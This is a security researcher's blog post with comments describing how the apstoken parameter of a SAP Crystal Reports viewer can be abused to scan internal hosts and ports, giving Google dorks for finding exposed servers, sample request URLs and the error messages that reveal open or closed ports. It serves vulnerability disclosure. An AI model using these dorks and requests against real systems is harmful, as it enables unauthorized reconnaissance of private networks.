Internal Port Scanning via Crystal Reports

Another fun attack that willis and I found during our SAP BusinessObjects research is that we could do internal port scanning by using Crystal Reports.

The way this works is that when you browse to a Crystal Reports web application (http://hostname/CrystalReports/viewrpt.cwr) there are a few parameters which are used to communicate with the SAP services on the backend. The problem here is that these parameters are controlled by the user. Now a better way to do this is to provide a drop-down list or make all the configurations done by the server.

Now the user can modify the IP and port which the web application is trying to communicate with on the backend. By default the port is 6400. Now the ability to modify the IP and port is good. The next step is to map the responses to open and closed so that we could programmatically map out the internal network.

Here are a few nice Google Dorks:
inurl:viewrpt.cwr
filetype:cwr inurl:apstoken

Here is the resulting mapping :

http://hostname/CrystalReports/viewrpt.cwr?id=$ID&wid=$WID&apstoken=internal_ip_address:445@$TOKEN

Port Open Response:
# Unable to open a socket to talk to CMS $HOSTNAME:445 (FWM 01005)

http://hostname/CrystalReports/viewrpt.cwr?id=$ID&wid=$WID&apstoken=internal_ip_address:80@$TOKEN

Port Closed Response :
# Server $HOSTNAME:80 not found or server may be down (FWM 01003)

Lastly the only thing we need to do is to modify the IP and port to whatever we are trying to scan. This is faster than using BeEF’s JavaScript internal portscanning functionality and it doesn’t require client interaction. Pwn dem v0hns!

Enjoy!

Regards,
Jabra

About these ads

3 Responses to Internal Port Scanning via Crystal Reports

  1. [...] This post was mentioned on Twitter by Timeless Prototype, Josh Abraham. Josh Abraham said: Internal Port Scanning via Crystal Reports http://bit.ly/g2O9Rt [...]

  2. Marc Ruef says:

    Hello,

    Nice finding. Is there any slight chance that you see the response on open ports (e.g. for banner grabbing)?

    Regards,

    Marc

    • Jabra says:

      Thanks. As I mentioned in the blog post open ports contain the following response:

      “Unable to open a socket to talk to CMS $HOSTNAME:445 (FWM 01005)”

      Regards,
      Jabra

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: